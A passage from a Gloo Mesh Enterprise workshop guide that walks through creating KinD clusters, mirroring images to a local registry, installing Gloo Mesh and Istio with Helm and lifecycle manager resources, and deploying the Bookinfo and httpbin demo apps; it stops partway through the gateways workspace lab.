- Introduction
- Lab 1 - Deploy KinD clusters
- Lab 2 - Prepare airgap environment
- Lab 3 - Deploy and register Gloo Mesh
- Lab 4 - Deploy Istio using Gloo Mesh Lifecycle Manager
- Lab 5 - Deploy the Bookinfo demo app
- Lab 6 - Deploy the httpbin demo app
- Lab 7 - Deploy Gloo Mesh Addons
- Lab 8 - Create the gateways workspace
- Lab 9 - Create the bookinfo workspace
- Lab 10 - Expose the productpage through a gateway
- Lab 11 - Traffic policies
- Lab 12 - Create the Root Trust Policy
- Lab 13 - Leverage Virtual Destinations
- Lab 14 - Zero trust
- Lab 15 - Create the httpbin workspace
- Lab 16 - Expose an external service
- Lab 17 - Deploy Keycloak
- Lab 18 - Securing the access with OAuth
- Lab 19 - Use the JWT filter to create headers from claims
- Lab 20 - Use the transformation filter to manipulate headers
- Lab 21 - Apply rate limiting to the Gateway
- Lab 22 - Use the Web Application Firewall filter
Gloo Mesh Enterprise is a management plane that makes it easy to operate Istio on one or many Kubernetes clusters, deployed on any platform, anywhere.
The Gloo Mesh Enterprise subscription includes end-to-end Istio support:
- Upstream first
- Specialty builds available (FIPS, ARM, etc)
- Long Term Support (LTS) N-4
- Critical security patches
- Production break-fix
- One-hour SLA for Severity 1 issues
- Install / upgrade
- Architecture and operational guidance, best practices
Gloo Mesh provides many unique features, including:
- multi-tenancy based on global workspaces
- zero trust enforcement
- global observability (centralized metrics and access logging)
- simplified cross cluster communications (using virtual destinations)
- advanced gateway capabilities (OAuth, JWT, transformations, rate limiting, web application firewall, ...)
You can find more information about Gloo Mesh in the official documentation:
https://docs.solo.io/gloo-mesh/latest/
Clone this repository and go to the directory where this README.md
file is.
Set the context environment variables:
export MGMT=mgmt
export CLUSTER1=cluster1
export CLUSTER2=cluster2
Note that if you don't have a Kubernetes cluster dedicated to the management plane, you can set the variables as follows:
export MGMT=cluster1
export CLUSTER1=cluster1
export CLUSTER2=cluster2
Run the following commands to deploy three Kubernetes clusters using Kind:
./scripts/deploy.sh 1 mgmt
./scripts/deploy.sh 2 cluster1 us-west us-west-1
./scripts/deploy.sh 3 cluster2 us-west us-west-2
Then run the following commands to wait for all the Pods to be ready:
./scripts/check.sh mgmt
./scripts/check.sh cluster1
./scripts/check.sh cluster2
Note: If you run the check.sh
script immediately after the deploy.sh
script, you may see a jsonpath error. If that happens, simply wait a few seconds and try again.
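If you want to automate the retry, a small wrapper like the following can be used (a sketch, assuming check.sh exits with a non-zero code when it hits that error):
until ./scripts/check.sh cluster1; do
  echo "check.sh not ready yet, retrying in 5 seconds..."
  sleep 5
done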
Once the check.sh
script completes, when you execute the kubectl get pods -A
command, you should see the following:
NAMESPACE NAME READY STATUS RESTARTS AGE
kube-system calico-kube-controllers-59d85c5c84-sbk4k 1/1 Running 0 4h26m
kube-system calico-node-przxs 1/1 Running 0 4h26m
kube-system coredns-6955765f44-ln8f5 1/1 Running 0 4h26m
kube-system coredns-6955765f44-s7xxx 1/1 Running 0 4h26m
kube-system etcd-cluster1-control-plane 1/1 Running 0 4h27m
kube-system kube-apiserver-cluster1-control-plane 1/1 Running 0 4h27m
kube-system kube-controller-manager-cluster1-control-plane 1/1 Running 0 4h27m
kube-system kube-proxy-ksvzw 1/1 Running 0 4h26m
kube-system kube-scheduler-cluster1-control-plane 1/1 Running 0 4h27m
local-path-storage local-path-provisioner-58f6947c7-lfmdx 1/1 Running 0 4h26m
metallb-system controller-5c9894b5cd-cn9x2 1/1 Running 0 4h26m
metallb-system speaker-d7jkp 1/1 Running 0 4h26m
You can see which cluster you're currently connected to by executing the kubectl config get-contexts
command:
CURRENT NAME CLUSTER AUTHINFO NAMESPACE
cluster1 kind-cluster1 cluster1
* cluster2 kind-cluster2 cluster2
mgmt kind-mgmt kind-mgmt
Run the following command to make mgmt
the current cluster.
kubectl config use-context ${MGMT}
Set the registry variable:
registry=localhost:5000
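If your KinD setup doesn't already run a local registry on that port, here is a minimal sketch of starting one with Docker (the container name is arbitrary):
docker run -d --restart=always -p 5000:5000 --name kind-registry registry:2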
Pull the required Docker images and push them to the local registry:
cat <<EOF > images.txt
us-docker.pkg.dev/gloo-mesh/istio-workshops/operator:1.17.1-solo
us-docker.pkg.dev/gloo-mesh/istio-workshops/pilot:1.17.1-solo
us-docker.pkg.dev/gloo-mesh/istio-workshops/proxyv2:1.17.1-solo
quay.io/keycloak/keycloak:20.0.1
docker.io/kennethreitz/httpbin
EOF
for url in https://raw.githubusercontent.com/istio/istio/release-1.16/samples/bookinfo/platform/kube/bookinfo.yaml https://raw.githubusercontent.com/istio/istio/release-1.16/samples/bookinfo/networking/bookinfo-gateway.yaml
do
for image in $(curl -sfL ${url}|grep image:|awk '{print $2}')
do
echo $image >> images.txt
done
done
wget https://storage.googleapis.com/gloo-mesh-enterprise/gloo-mesh-agent/gloo-mesh-agent-2.2.6.tgz
tar zxvf gloo-mesh-agent-*.tgz
find gloo-mesh-agent -name "values.yaml" | while read file; do
cat $file | yq eval -j | jq -r '.. | .image? | select(. != null) | (if .hub then .hub + "/" + .repository + ":" + .tag else (if .registry then (if .registry == "docker.io" then "docker.io/library" else .registry end) + "/" else "" end) + .repository + ":" + (.tag | tostring) end)'
done | sort -u >> images.txt
wget https://storage.googleapis.com/gloo-mesh-enterprise/gloo-mesh-enterprise/gloo-mesh-enterprise-2.2.6.tgz
tar zxvf gloo-mesh-enterprise-*.tgz
find gloo-mesh-enterprise -name "values.yaml" | while read file; do
cat $file | yq eval -j | jq -r '.. | .image? | select(. != null) | (if .hub then .hub + "/" + .repository + ":" + .tag else (if .registry then (if .registry == "docker.io" then "docker.io/library" else .registry end) + "/" else "" end) + .repository + ":" + (.tag | tostring) end)'
done | sort -u >> images.txt
cat images.txt | while read image; do
nohup sh -c "echo $image | xargs -P10 -n1 docker pull" </dev/null >nohup.out 2>nohup.err &
done
cat images.txt | while read image; do
src=$(echo $image | sed 's/^docker\.io\///g' | sed 's/^library\///g')
dst=$(echo $image | awk -F/ '{ if(NF>3){ print $3"/"$4}else{if(NF>2){ print $2"/"$3}else{if($1=="docker.io"){print $2}else{print $1"/"$2}}}}' | sed 's/^library\///g')
docker pull $image
id=$(docker images $src --format "{{.ID}}")
docker tag $id ${registry}/$dst
docker push ${registry}/$dst
done
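Optionally, verify that the images have been pushed by querying the Docker Registry v2 API (jq is only used here for pretty-printing):
curl -s http://${registry}/v2/_catalog | jq .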
First of all, let's install the meshctl
CLI:
export GLOO_MESH_VERSION=v2.2.6
curl -sL https://run.solo.io/meshctl/install | sh -
export PATH=$HOME/.gloo-mesh/bin:$PATH
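You can verify that the CLI is installed and on your PATH:
meshctl version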
Run the following commands to deploy the Gloo Mesh management plane:
helm repo add gloo-mesh-enterprise https://storage.googleapis.com/gloo-mesh-enterprise/gloo-mesh-enterprise
helm repo update
kubectl --context ${MGMT} create ns gloo-mesh
helm upgrade --install gloo-mesh-enterprise gloo-mesh-enterprise/gloo-mesh-enterprise \
--namespace gloo-mesh --kube-context ${MGMT} \
--version=2.2.6 \
--set glooMeshMgmtServer.ports.healthcheck=8091 \
--set legacyMetricsPipeline.enabled=false \
--set metricsgateway.enabled=true \
--set metricsgateway.service.type=LoadBalancer \
--set glooMeshMgmtServer.image.registry=${registry}/gloo-mesh \
--set glooMeshUi.image.registry=${registry}/gloo-mesh \
--set glooMeshUi.sidecars.console.image.registry=${registry}/gloo-mesh \
--set glooMeshUi.sidecars.envoy.image.registry=${registry}/gloo-mesh \
--set metricsgateway.image.repository=${registry}/gloo-mesh/gloo-otel-collector \
--set prometheus.configmapReload.prometheus.image.repository=${registry}/jimmidyson/configmap-reload \
--set prometheus.server.image.repository=${registry}/prometheus/prometheus \
--set glooMeshRedis.image.registry=${registry} \
--set glooMeshUi.serviceType=LoadBalancer \
--set mgmtClusterName=${MGMT} \
--set global.cluster=${MGMT} \
--set licenseKey=${GLOO_MESH_LICENSE_KEY}
kubectl --context ${MGMT} -n gloo-mesh rollout status deploy/gloo-mesh-mgmt-server
Then, you need to set the environment variable to tell the Gloo Mesh agents how to communicate with the management plane:
export ENDPOINT_GLOO_MESH=$(kubectl --context ${MGMT} -n gloo-mesh get svc gloo-mesh-mgmt-server -o jsonpath='{.status.loadBalancer.ingress[0].*}'):9900
export HOST_GLOO_MESH=$(echo ${ENDPOINT_GLOO_MESH} | cut -d: -f1)
export ENDPOINT_METRICS_GATEWAY=$(kubectl --context ${MGMT} -n gloo-mesh get svc gloo-metrics-gateway -o jsonpath='{.status.loadBalancer.ingress[0].*}'):4317
Check that the variables have correct values:
echo $HOST_GLOO_MESH
echo $ENDPOINT_GLOO_MESH
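If either variable is empty, the LoadBalancer IP probably hasn't been assigned yet; a simple guard (just a sketch) can catch that before you continue:
[ -n "${HOST_GLOO_MESH}" ] || echo "HOST_GLOO_MESH is empty: wait for the LoadBalancer IP and re-run the export commands"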
Finally, you need to register the cluster(s).
Here is how you register the first one:
helm repo add gloo-mesh-agent https://storage.googleapis.com/gloo-mesh-enterprise/gloo-mesh-agent
helm repo update
kubectl apply --context ${MGMT} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: KubernetesCluster
metadata:
name: cluster1
namespace: gloo-mesh
spec:
clusterDomain: cluster.local
EOF
kubectl --context ${CLUSTER1} create ns gloo-mesh
kubectl get secret relay-root-tls-secret -n gloo-mesh --context ${MGMT} -o jsonpath='{.data.ca\.crt}' | base64 -d > ca.crt
kubectl create secret generic relay-root-tls-secret -n gloo-mesh --context ${CLUSTER1} --from-file ca.crt=ca.crt
rm ca.crt
kubectl get secret relay-identity-token-secret -n gloo-mesh --context ${MGMT} -o jsonpath='{.data.token}' | base64 -d > token
kubectl create secret generic relay-identity-token-secret -n gloo-mesh --context ${CLUSTER1} --from-file token=token
rm token
helm upgrade --install gloo-mesh-agent gloo-mesh-agent/gloo-mesh-agent \
--namespace gloo-mesh \
--kube-context=${CLUSTER1} \
--set relay.serverAddress=${ENDPOINT_GLOO_MESH} \
--set relay.authority=gloo-mesh-mgmt-server.gloo-mesh \
--set rate-limiter.enabled=false \
--set ext-auth-service.enabled=false \
--set glooMeshPortalServer.enabled=false \
--set cluster=cluster1 \
--set metricscollector.enabled=true \
--set metricscollector.config.exporters.otlp.endpoint=\"${ENDPOINT_METRICS_GATEWAY}\" \
--set glooMeshAgent.image.registry=${registry}/gloo-mesh \
--set metricscollector.image.repository=${registry}/gloo-mesh/gloo-otel-collector \
--version 2.2.6
Note that the registration can also be performed using meshctl cluster register.
And here is how you register the second one:
kubectl apply --context ${MGMT} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: KubernetesCluster
metadata:
name: cluster2
namespace: gloo-mesh
spec:
clusterDomain: cluster.local
EOF
kubectl --context ${CLUSTER2} create ns gloo-mesh
kubectl get secret relay-root-tls-secret -n gloo-mesh --context ${MGMT} -o jsonpath='{.data.ca\.crt}' | base64 -d > ca.crt
kubectl create secret generic relay-root-tls-secret -n gloo-mesh --context ${CLUSTER2} --from-file ca.crt=ca.crt
rm ca.crt
kubectl get secret relay-identity-token-secret -n gloo-mesh --context ${MGMT} -o jsonpath='{.data.token}' | base64 -d > token
kubectl create secret generic relay-identity-token-secret -n gloo-mesh --context ${CLUSTER2} --from-file token=token
rm token
helm upgrade --install gloo-mesh-agent gloo-mesh-agent/gloo-mesh-agent \
--namespace gloo-mesh \
--kube-context=${CLUSTER2} \
--set relay.serverAddress=${ENDPOINT_GLOO_MESH} \
--set relay.authority=gloo-mesh-mgmt-server.gloo-mesh \
--set rate-limiter.enabled=false \
--set ext-auth-service.enabled=false \
--set glooMeshPortalServer.enabled=false \
--set cluster=cluster2 \
--set metricscollector.enabled=true \
--set metricscollector.config.exporters.otlp.endpoint=\"${ENDPOINT_METRICS_GATEWAY}\" \
--set glooMeshAgent.image.registry=${registry}/gloo-mesh \
--set metricscollector.image.repository=${registry}/gloo-mesh/gloo-otel-collector \
--version 2.2.6
You can check that the cluster(s) have been registered correctly using the following commands:
meshctl --kubecontext ${MGMT} check
pod=$(kubectl --context ${MGMT} -n gloo-mesh get pods -l app=gloo-mesh-mgmt-server -o jsonpath='{.items[0].metadata.name}')
kubectl --context ${MGMT} -n gloo-mesh debug -q -i ${pod} --image=curlimages/curl -- curl -s http://localhost:9091/metrics | grep relay_push_clients_connected
You should get an output similar to this:
# HELP relay_push_clients_connected Current number of connected Relay push clients (Relay Agents).
# TYPE relay_push_clients_connected gauge
relay_push_clients_connected{cluster="cluster1"} 1
relay_push_clients_connected{cluster="cluster2"} 1
Finally, you need to specify which gateways you want to use for cross cluster traffic:
cat <<EOF | kubectl --context ${MGMT} apply -f -
apiVersion: admin.gloo.solo.io/v2
kind: WorkspaceSettings
metadata:
name: global
namespace: gloo-mesh
spec:
options:
eastWestGateways:
- selector:
labels:
istio: eastwestgateway
EOF
We are going to deploy Istio using Gloo Mesh Lifecycle Manager.
First of all, let's create Kubernetes services for the gateways:
registry=localhost:5000
kubectl --context ${CLUSTER1} create ns istio-gateways
kubectl --context ${CLUSTER1} label namespace istio-gateways istio.io/rev=1-17 --overwrite
cat << EOF | kubectl --context ${CLUSTER1} apply -f -
apiVersion: v1
kind: Service
metadata:
labels:
app: istio-ingressgateway
istio: ingressgateway
name: istio-ingressgateway
namespace: istio-gateways
spec:
ports:
- name: http2
port: 80
protocol: TCP
targetPort: 8080
- name: https
port: 443
protocol: TCP
targetPort: 8443
selector:
app: istio-ingressgateway
istio: ingressgateway
revision: 1-17
type: LoadBalancer
EOF
cat << EOF | kubectl --context ${CLUSTER1} apply -f -
apiVersion: v1
kind: Service
metadata:
labels:
app: istio-ingressgateway
istio: eastwestgateway
topology.istio.io/network: cluster1
name: istio-eastwestgateway
namespace: istio-gateways
spec:
ports:
- name: status-port
port: 15021
protocol: TCP
targetPort: 15021
- name: tls
port: 15443
protocol: TCP
targetPort: 15443
- name: https
port: 16443
protocol: TCP
targetPort: 16443
- name: tcp-istiod
port: 15012
protocol: TCP
targetPort: 15012
- name: tcp-webhook
port: 15017
protocol: TCP
targetPort: 15017
selector:
app: istio-ingressgateway
istio: eastwestgateway
revision: 1-17
topology.istio.io/network: cluster1
type: LoadBalancer
EOF
kubectl --context ${CLUSTER2} create ns istio-gateways
kubectl --context ${CLUSTER2} label namespace istio-gateways istio.io/rev=1-17 --overwrite
cat << EOF | kubectl --context ${CLUSTER2} apply -f -
apiVersion: v1
kind: Service
metadata:
labels:
app: istio-ingressgateway
istio: ingressgateway
name: istio-ingressgateway
namespace: istio-gateways
spec:
ports:
- name: http2
port: 80
protocol: TCP
targetPort: 8080
- name: https
port: 443
protocol: TCP
targetPort: 8443
selector:
app: istio-ingressgateway
istio: ingressgateway
revision: 1-17
type: LoadBalancer
EOF
cat << EOF | kubectl --context ${CLUSTER2} apply -f -
apiVersion: v1
kind: Service
metadata:
labels:
app: istio-ingressgateway
istio: eastwestgateway
topology.istio.io/network: cluster2
name: istio-eastwestgateway
namespace: istio-gateways
spec:
ports:
- name: status-port
port: 15021
protocol: TCP
targetPort: 15021
- name: tls
port: 15443
protocol: TCP
targetPort: 15443
- name: https
port: 16443
protocol: TCP
targetPort: 16443
- name: tcp-istiod
port: 15012
protocol: TCP
targetPort: 15012
- name: tcp-webhook
port: 15017
protocol: TCP
targetPort: 15017
selector:
app: istio-ingressgateway
istio: eastwestgateway
revision: 1-17
topology.istio.io/network: cluster2
type: LoadBalancer
EOF
Creating these Kubernetes services ourselves gives us full control over which Istio revision we want to use.
Then, we can tell Gloo Mesh to deploy the Istio control planes and the gateways in the cluster(s):
cat << EOF | kubectl --context ${MGMT} apply -f -
apiVersion: admin.gloo.solo.io/v2
kind: IstioLifecycleManager
metadata:
name: cluster1-installation
namespace: gloo-mesh
spec:
installations:
- clusters:
- name: cluster1
defaultRevision: true
revision: 1-17
istioOperatorSpec:
profile: minimal
hub: ${registry}/istio-workshops
tag: 1.17.1-solo
namespace: istio-system
values:
global:
meshID: mesh1
multiCluster:
clusterName: cluster1
network: cluster1
meshConfig:
accessLogFile: /dev/stdout
defaultConfig:
proxyMetadata:
ISTIO_META_DNS_CAPTURE: "true"
ISTIO_META_DNS_AUTO_ALLOCATE: "true"
components:
pilot:
k8s:
env:
- name: PILOT_ENABLE_K8S_SELECT_WORKLOAD_ENTRIES
value: "false"
ingressGateways:
- name: istio-ingressgateway
enabled: false
EOF
cat << EOF | kubectl --context ${MGMT} apply -f -
apiVersion: admin.gloo.solo.io/v2
kind: GatewayLifecycleManager
metadata:
name: cluster1-ingress
namespace: gloo-mesh
spec:
installations:
- clusters:
- name: cluster1
activeGateway: false
gatewayRevision: 1-17
istioOperatorSpec:
profile: empty
hub: ${registry}/istio-workshops
tag: 1.17.1-solo
values:
gateways:
istio-ingressgateway:
customService: true
components:
ingressGateways:
- name: istio-ingressgateway
namespace: istio-gateways
enabled: true
label:
istio: ingressgateway
---
apiVersion: admin.gloo.solo.io/v2
kind: GatewayLifecycleManager
metadata:
name: cluster1-eastwest
namespace: gloo-mesh
spec:
installations:
- clusters:
- name: cluster1
activeGateway: false
gatewayRevision: 1-17
istioOperatorSpec:
profile: empty
hub: ${registry}/istio-workshops
tag: 1.17.1-solo
values:
gateways:
istio-ingressgateway:
customService: true
components:
ingressGateways:
- name: istio-eastwestgateway
namespace: istio-gateways
enabled: true
label:
istio: eastwestgateway
topology.istio.io/network: cluster1
k8s:
env:
- name: ISTIO_META_ROUTER_MODE
value: "sni-dnat"
- name: ISTIO_META_REQUESTED_NETWORK_VIEW
value: cluster1
EOF
cat << EOF | kubectl --context ${MGMT} apply -f -
apiVersion: admin.gloo.solo.io/v2
kind: IstioLifecycleManager
metadata:
name: cluster2-installation
namespace: gloo-mesh
spec:
installations:
- clusters:
- name: cluster2
defaultRevision: true
revision: 1-17
istioOperatorSpec:
profile: minimal
hub: ${registry}/istio-workshops
tag: 1.17.1-solo
namespace: istio-system
values:
global:
meshID: mesh1
multiCluster:
clusterName: cluster2
network: cluster2
meshConfig:
accessLogFile: /dev/stdout
defaultConfig:
proxyMetadata:
ISTIO_META_DNS_CAPTURE: "true"
ISTIO_META_DNS_AUTO_ALLOCATE: "true"
components:
pilot:
k8s:
env:
- name: PILOT_ENABLE_K8S_SELECT_WORKLOAD_ENTRIES
value: "false"
ingressGateways:
- name: istio-ingressgateway
enabled: false
EOF
cat << EOF | kubectl --context ${MGMT} apply -f -
apiVersion: admin.gloo.solo.io/v2
kind: GatewayLifecycleManager
metadata:
name: cluster2-ingress
namespace: gloo-mesh
spec:
installations:
- clusters:
- name: cluster2
activeGateway: false
gatewayRevision: 1-17
istioOperatorSpec:
profile: empty
hub: ${registry}/istio-workshops
tag: 1.17.1-solo
values:
gateways:
istio-ingressgateway:
customService: true
components:
ingressGateways:
- name: istio-ingressgateway
namespace: istio-gateways
enabled: true
label:
istio: ingressgateway
---
apiVersion: admin.gloo.solo.io/v2
kind: GatewayLifecycleManager
metadata:
name: cluster2-eastwest
namespace: gloo-mesh
spec:
installations:
- clusters:
- name: cluster2
activeGateway: false
gatewayRevision: 1-17
istioOperatorSpec:
profile: empty
hub: ${registry}/istio-workshops
tag: 1.17.1-solo
values:
gateways:
istio-ingressgateway:
customService: true
components:
ingressGateways:
- name: istio-eastwestgateway
namespace: istio-gateways
enabled: true
label:
istio: eastwestgateway
topology.istio.io/network: cluster2
k8s:
env:
- name: ISTIO_META_ROUTER_MODE
value: "sni-dnat"
- name: ISTIO_META_REQUESTED_NETWORK_VIEW
value: cluster2
EOF
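The Istio installation can take a few minutes. Before moving on, you can check that the control plane and gateway Pods are running on both clusters:
kubectl --context ${CLUSTER1} get pods -n istio-system
kubectl --context ${CLUSTER1} get pods -n istio-gateways
kubectl --context ${CLUSTER2} get pods -n istio-system
kubectl --context ${CLUSTER2} get pods -n istio-gateways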
Set the environment variable for the service corresponding to the Istio Ingress Gateway of the cluster(s):
export ENDPOINT_HTTP_GW_CLUSTER1=$(kubectl --context ${CLUSTER1} -n istio-gateways get svc -l istio=ingressgateway -o jsonpath='{.items[0].status.loadBalancer.ingress[0].*}'):80
export ENDPOINT_HTTPS_GW_CLUSTER1=$(kubectl --context ${CLUSTER1} -n istio-gateways get svc -l istio=ingressgateway -o jsonpath='{.items[0].status.loadBalancer.ingress[0].*}'):443
export HOST_GW_CLUSTER1=$(echo ${ENDPOINT_HTTP_GW_CLUSTER1} | cut -d: -f1)
export ENDPOINT_HTTP_GW_CLUSTER2=$(kubectl --context ${CLUSTER2} -n istio-gateways get svc -l istio=ingressgateway -o jsonpath='{.items[0].status.loadBalancer.ingress[0].*}'):80
export ENDPOINT_HTTPS_GW_CLUSTER2=$(kubectl --context ${CLUSTER2} -n istio-gateways get svc -l istio=ingressgateway -o jsonpath='{.items[0].status.loadBalancer.ingress[0].*}'):443
export HOST_GW_CLUSTER2=$(echo ${ENDPOINT_HTTP_GW_CLUSTER2} | cut -d: -f1)
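Check that the variables have correct values:
echo $ENDPOINT_HTTP_GW_CLUSTER1
echo $ENDPOINT_HTTPS_GW_CLUSTER1
echo $ENDPOINT_HTTP_GW_CLUSTER2
echo $ENDPOINT_HTTPS_GW_CLUSTER2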
We're going to deploy the bookinfo application to demonstrate several features of Gloo Mesh.
You can find more information about this application here. Download the Bookinfo YAML and update the image registry:
curl https://raw.githubusercontent.com/istio/istio/release-1.16/samples/bookinfo/platform/kube/bookinfo.yaml | sed "s/image: docker.io/image: ${registry}/g" > bookinfo.yaml
Run the following commands to deploy the bookinfo application on cluster1
:
kubectl --context ${CLUSTER1} create ns bookinfo-frontends
kubectl --context ${CLUSTER1} create ns bookinfo-backends
kubectl --context ${CLUSTER1} label namespace bookinfo-frontends istio.io/rev=1-17 --overwrite
kubectl --context ${CLUSTER1} label namespace bookinfo-backends istio.io/rev=1-17 --overwrite
# deploy the frontend bookinfo service in the bookinfo-frontends namespace
kubectl --context ${CLUSTER1} -n bookinfo-frontends apply -f bookinfo.yaml -l 'account in (productpage)'
kubectl --context ${CLUSTER1} -n bookinfo-frontends apply -f bookinfo.yaml -l 'app in (productpage)'
kubectl --context ${CLUSTER1} -n bookinfo-backends apply -f bookinfo.yaml -l 'account in (reviews,ratings,details)'
# deploy the backend bookinfo services in the bookinfo-backends namespace for all versions less than v3
kubectl --context ${CLUSTER1} -n bookinfo-backends apply -f bookinfo.yaml -l 'app in (reviews,ratings,details),version notin (v3)'
# Update the productpage deployment to set the environment variables to define where the backend services are running
kubectl --context ${CLUSTER1} -n bookinfo-frontends set env deploy/productpage-v1 DETAILS_HOSTNAME=details.bookinfo-backends.svc.cluster.local
kubectl --context ${CLUSTER1} -n bookinfo-frontends set env deploy/productpage-v1 REVIEWS_HOSTNAME=reviews.bookinfo-backends.svc.cluster.local
# Update the reviews service to display where it is coming from
kubectl --context ${CLUSTER1} -n bookinfo-backends set env deploy/reviews-v1 CLUSTER_NAME=${CLUSTER1}
kubectl --context ${CLUSTER1} -n bookinfo-backends set env deploy/reviews-v2 CLUSTER_NAME=${CLUSTER1}
You can check that the app is running using the following command:
kubectl --context ${CLUSTER1} -n bookinfo-frontends get pods && kubectl --context ${CLUSTER1} -n bookinfo-backends get pods
Note that we deployed the productpage
service in the bookinfo-frontends
namespace and the other services in the bookinfo-backends
namespace.
And we deployed the v1
and v2
versions of the reviews
microservice, not the v3
version.
Now, run the following commands to deploy the bookinfo application on cluster2
:
kubectl --context ${CLUSTER2} create ns bookinfo-frontends
kubectl --context ${CLUSTER2} create ns bookinfo-backends
kubectl --context ${CLUSTER2} label namespace bookinfo-frontends istio.io/rev=1-17 --overwrite
kubectl --context ${CLUSTER2} label namespace bookinfo-backends istio.io/rev=1-17 --overwrite
# deploy the frontend bookinfo service in the bookinfo-frontends namespace
kubectl --context ${CLUSTER2} -n bookinfo-frontends apply -f bookinfo.yaml -l 'account in (productpage)'
kubectl --context ${CLUSTER2} -n bookinfo-frontends apply -f bookinfo.yaml -l 'app in (productpage)'
kubectl --context ${CLUSTER2} -n bookinfo-backends apply -f bookinfo.yaml -l 'account in (reviews,ratings,details)'
# deploy the backend bookinfo services in the bookinfo-backends namespace for all versions
kubectl --context ${CLUSTER2} -n bookinfo-backends apply -f bookinfo.yaml -l 'app in (reviews,ratings,details)'
# Update the productpage deployment to set the environment variables to define where the backend services are running
kubectl --context ${CLUSTER2} -n bookinfo-frontends set env deploy/productpage-v1 DETAILS_HOSTNAME=details.bookinfo-backends.svc.cluster.local
kubectl --context ${CLUSTER2} -n bookinfo-frontends set env deploy/productpage-v1 REVIEWS_HOSTNAME=reviews.bookinfo-backends.svc.cluster.local
# Update the reviews service to display where it is coming from
kubectl --context ${CLUSTER2} -n bookinfo-backends set env deploy/reviews-v1 CLUSTER_NAME=${CLUSTER2}
kubectl --context ${CLUSTER2} -n bookinfo-backends set env deploy/reviews-v2 CLUSTER_NAME=${CLUSTER2}
kubectl --context ${CLUSTER2} -n bookinfo-backends set env deploy/reviews-v3 CLUSTER_NAME=${CLUSTER2}
You can check that the app is running using:
kubectl --context ${CLUSTER2} -n bookinfo-frontends get pods && kubectl --context ${CLUSTER2} -n bookinfo-backends get pods
As you can see, we deployed all three versions of the reviews
microservice on this cluster.
We're going to deploy the httpbin application to demonstrate several features of Gloo Mesh.
You can find more information about this application here.
Run the following commands to deploy the httpbin app on cluster1
. The deployment will be called not-in-mesh
and won't have the sidecar injected (because we don't label the namespace).
kubectl --context ${CLUSTER1} create ns httpbin
kubectl --context ${CLUSTER1} apply -n httpbin -f - <<EOF
apiVersion: v1
kind: ServiceAccount
metadata:
name: not-in-mesh
---
apiVersion: v1
kind: Service
metadata:
name: not-in-mesh
labels:
app: not-in-mesh
service: not-in-mesh
spec:
ports:
- name: http
port: 8000
targetPort: 80
selector:
app: not-in-mesh
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: not-in-mesh
spec:
replicas: 1
selector:
matchLabels:
app: not-in-mesh
version: v1
template:
metadata:
labels:
app: not-in-mesh
version: v1
spec:
serviceAccountName: not-in-mesh
containers:
- image: ${registry}/kennethreitz/httpbin
imagePullPolicy: IfNotPresent
name: not-in-mesh
ports:
- containerPort: 80
EOF
Then, we deploy a second version, which will be called in-mesh
and will have the sidecar injected (because of the label istio.io/rev
in the Pod template).
kubectl --context ${CLUSTER1} apply -n httpbin -f - <<EOF
apiVersion: v1
kind: ServiceAccount
metadata:
name: in-mesh
---
apiVersion: v1
kind: Service
metadata:
name: in-mesh
labels:
app: in-mesh
service: in-mesh
spec:
ports:
- name: http
port: 8000
targetPort: 80
selector:
app: in-mesh
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: in-mesh
spec:
replicas: 1
selector:
matchLabels:
app: in-mesh
version: v1
template:
metadata:
labels:
app: in-mesh
version: v1
istio.io/rev: 1-17
spec:
serviceAccountName: in-mesh
containers:
- image: ${registry}/kennethreitz/httpbin
imagePullPolicy: IfNotPresent
name: in-mesh
ports:
- containerPort: 80
EOF
You can follow the progress using the following command:
kubectl --context ${CLUSTER1} -n httpbin get pods
NAME READY STATUS RESTARTS AGE
in-mesh-5d9d9549b5-qrdgd 2/2 Running 0 11s
not-in-mesh-5c64bb49cd-m9kwm 1/1 Running 0 11s
To use the Gloo Mesh Gateway advanced features (external authentication, rate limiting, ...), you need to install the Gloo Mesh addons.
First, you need to create a namespace for the addons, with Istio injection enabled:
kubectl --context ${CLUSTER1} create namespace gloo-mesh-addons
kubectl --context ${CLUSTER1} label namespace gloo-mesh-addons istio.io/rev=1-17 --overwrite
kubectl --context ${CLUSTER2} create namespace gloo-mesh-addons
kubectl --context ${CLUSTER2} label namespace gloo-mesh-addons istio.io/rev=1-17 --overwrite
Then, you can deploy the addons on the cluster(s) using Helm:
helm upgrade --install gloo-mesh-agent-addons gloo-mesh-agent/gloo-mesh-agent \
--namespace gloo-mesh-addons \
--kube-context=${CLUSTER1} \
--set cluster=cluster1 \
--set glooMeshAgent.enabled=false \
--set glooMeshPortalServer.enabled=true \
--set rate-limiter.enabled=true \
--set ext-auth-service.enabled=true \
--set ext-auth-service.extAuth.image.registry=${registry}/gloo-mesh \
--set rate-limiter.rateLimiter.image.registry=${registry}/gloo-mesh \
--set rate-limiter.redis.image.registry=${registry} \
--version 2.2.6
helm upgrade --install gloo-mesh-agent-addons gloo-mesh-agent/gloo-mesh-agent \
--namespace gloo-mesh-addons \
--kube-context=${CLUSTER2} \
--set cluster=cluster2 \
--set glooMeshAgent.enabled=false \
--set glooMeshPortalServer.enabled=true \
--set rate-limiter.enabled=true \
--set ext-auth-service.enabled=true \
--set ext-auth-service.extAuth.image.registry=${registry}/gloo-mesh \
--set rate-limiter.rateLimiter.image.registry=${registry}/gloo-mesh \
--set rate-limiter.redis.image.registry=${registry} \
--version 2.2.6
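You can verify that the addons are running on both clusters:
kubectl --context ${CLUSTER1} -n gloo-mesh-addons get pods
kubectl --context ${CLUSTER2} -n gloo-mesh-addons get pods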
This is how the environment looks now:
We're going to create a workspace for the team in charge of the Gateways.
The platform team needs to create the corresponding Workspace
Kubernetes objects in the Gloo Mesh management cluster.
Let's create the gateways
workspace which corresponds to the istio-gateways
and the gloo-mesh-addons
namespaces on the cluster(s):
kubectl apply --context ${MGMT} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: Workspace
metadata:
name: gateways
namespace: gloo-mesh
spec:
workloadClusters:
- name: cluster1
namespaces:
- name: istio-gateways
- name: gloo-mesh-addons
- name: cluster2
namespaces:
- name: istio-gateways
- name: gloo-mesh-addons
EOF
Then, the Gateway team creates a WorkspaceSettings
Kubernetes object in one of the namespaces of the gateways
workspace (so the istio-gateways
or the gloo-mesh-addons
namespace):
kubectl apply --context ${CLUSTER1} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: WorkspaceSettings
metadata:
name: gateways
namespace: istio-gateways
spec:
importFrom:
- workspaces:
- selector:
